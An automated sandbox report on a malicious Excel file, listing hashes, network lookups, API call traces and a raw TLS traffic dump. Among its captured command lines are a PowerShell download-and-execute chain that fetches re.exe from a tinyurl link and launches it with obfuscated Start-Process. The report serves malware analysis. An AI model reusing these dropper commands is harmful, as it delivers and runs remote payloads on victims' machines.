popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

9e227b07643afd3444c4d30f0c47c3cf.xls

Antivirus
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 April 6, 2021, 4:40 p.m. April 6, 2021, 4:43 p.m.
Size 56.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: Alexis UZAN, Create Time/Date: Sun Sep 20 21:17:44 2020, Last Saved Time/Date: Tue Sep 22 19:16:56 2020, Security: 1
MD5 9e227b07643afd3444c4d30f0c47c3cf
SHA256 d3345db33851543b968f728d2a342c49dc72b0dc633da851518d8585e53af3ce
CRC32 62802116
ssdeep 1536:1XnSGiysRchNXHfA1MiWhZFGkEld+Dr7OnkdyYWptOr5TwjJ1t:1XnSGiysRchNXHfA1MiWhZFGkEld+DrS
Yara
  • Microsoft_Office_Document_Zero - Microsoft Office Document Signature Zero

Name Response Post-Analysis Lookup
tinyurl.com
A 172.67.1.225
A 104.20.139.65
A 104.20.138.65
172.67.1.225
IP Address Status Action
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
172.67.1.225 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Start-Process : This command cannot be executed due to the error: This version
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: of %1 is not compatible with the version of Windows you're running. Check your
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: computer's system information to see whether you need a x86 (32-bit) or x64 (64
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: -bit) version of the program, and then contact the software publisher.
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: At line:1 char:33
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + Start-Sleep 12; sTArt-`P`R`ocess <<<< $env:appdata\re.exe
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: erationException
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: ommands.StartProcessCommand
console_handle: 0x0000008f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e0ac0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1240
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1240
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1240
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1240
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1240
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1240
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e0a80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e0a80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e0a80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e0680
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e13c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004e1300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0066abe0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0066b1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0066b1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0066b1a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0066b4e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0066b4e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0066b4e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0066b4e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0066b4e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0066b4e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://tinyurl.com/y3psaqmm
suspicious_features GET method with no useragent header suspicious_request GET https://tinyurl.com/app/nospam/tinyurl.com/y3psaqmm/terminated
request GET https://tinyurl.com/y3psaqmm
request GET https://tinyurl.com/app/nospam/tinyurl.com/y3psaqmm/terminated
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2352
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70af1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2352
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2352
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2352
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x743c1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04fc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05020000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05030000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2352
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2352
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73711000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 1835008
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02970000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f631000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0221a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f632000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02212000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02222000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02223000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02224000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0221b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02225000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02226000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05010000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05011000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05014000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05015000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05016000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05017000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05018000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05019000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0501a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0501b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\re.exe
file C:\Users\test22\Documents\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -w 1 Start-Sleep 12; sTArt-`P`R`ocess $env:appdata\re.exe
cmdline powershell -w 1 (New-Object Net.WebClient).DownloadFile('https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received W`l ˜¤…Øq'ÆÉKTfñ€÷ÝÎ “çDOWNGRD Û­òàÛûËfß&iíÅñ%€³Ê!w¶ÙÆ_=žâ®Àÿ 
Data received  û
Data received ÷ ôR0‚N0‚6 @I U2Òñÿ¶ÒÉ8Bª0  *†H†÷  0J1 0 UUS10U Cloudflare, Inc.1 0UCloudflare Inc RSA CA-20 200803000000Z 210803120000Z0m1 0 UUS1 0 UCA10U San Francisco10U Cloudflare, Inc.10Usni.cloudflaressl.com0‚"0  *†H†÷ ‚0‚ ‚ô"6¢\¼üBdY ûŽQރ`ÃxWf]_žäᏼǚ‘ˆYQ쟇V0jG^AåùÂȱºÞÈx^(ôÜPÏ|ó¿´wö âBiûbšU‘ÅbšBY(ë%k¡û ÕˆO_¬ƒiú³€Û*N4Ý)Ý÷ᑥ¢©úoÏ)]‰(‹KÕ`QÀTñÑg}WL)•ˆžm.»ÜÁʔt„¼T[…u®•€ÔcÝô)&ÅTj—²®4²èš䥍+áP«”ÏƽûÃx«2Líó—}ŖpXðVdØeQ8Ÿ#Óä%[j€åûï$AhY1ÿ_¼e?žXí£‚ 0‚0U#0€©ü²EIÁo04+هœ°%Wz0UŽcó{F¥Kvԍ ØäCZ‰·0<U503‚sni.cloudflaressl.com‚ *.tinyurl.com‚ tinyurl.com0Uÿ 0U%0++0{Ut0r07 5 3†1http://crl3.digicert.com/CloudflareIncRSACA-2.crl07 5 3†1http://crl4.digicert.com/CloudflareIncRSACA-2.crl0LU E0C07 `†H†ýl0*0(+https://www.digicert.com/CPS0g 0v+j0h0$+0†http://ocsp.digicert.com0@+0†4http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0 Uÿ00‚ +Öyöóñwö\”/Ñw0"T0”VŽãM3¿ß / ÌNñdãs±·˜5H0F!²Sç'À©ßÕ~…KÊWc¡¸ÉhZðÁ !tIn!ÀfB ¢úý †X|@ÍÛn_É*Ö÷›ŒbN-}ÓH–5v\ÜC’þæ«ED±^šÔVæ7ûÕúGÜ¡s”²^æöÇÊs±·˜eG0E ]{qGl4°m‡ÍTíAü4Ìì30¬D­ZÉtO!̚‡ø¼?ÍÁAU<4Ê;#|¡—ë.ÿ5Öî0Ï 0  *†H†÷  ‚ yî7Þ µßÏ`^4(!ˁ_‹M–÷.púXz EL†Lâ@I;¨ºY ‰Àj RtëÄ(Šg&V¦Xb4‰çGUmÇå’ÙàaªÑèŒZ»ñs>)2|›vZ:Øð0ÙJ¢ÈŠoXórBZÕô⳨]†§Õ>>f ÿcÖ¯Þ Ã9`çÂ~Š…y4üEÏ#û+ᕀ=¿\÷f¹é¿L8$¡$ß¹¹ã­&¢Í$Š˜ ?ú¥m³¹ª¿SY>’jÏ"¯N}’‘ž~]lm݊†¯²`&ŸV#ôt¡çZ+tÖ¡ ª(ø $A `ësÿ&Ž!œ0‚˜0‚€ ؚsó³¸Ú[X8˜)0  *†H†÷  0Z1 0 UIE10U  Baltimore10U  CyberTrust1"0 UBaltimore CyberTrust Root0 200127124639Z 241231235959Z0J1 0 UUS10U Cloudflare, Inc.1 0UCloudflare Inc RSA CA-20‚"0  *†H†÷ ‚0‚ ‚µ]&È «±3] ²–Â1N~_‡Æo€$íÚ®¾ç€÷ÅÏTf8(èæi»ø1jVõèÁ¥èYè³à:a(°~Í ýÎ7Ã驍 Éxʦ`F€¯t-OÚè RțZ2Ï!!G\ŠªÀp±ñÞß-…©•ì[W99¾…Âï׶,J?ÑÖ³!¢—O%,B#}׳Öi…¯ÕªØhd㭝R/Ååô‘¯å 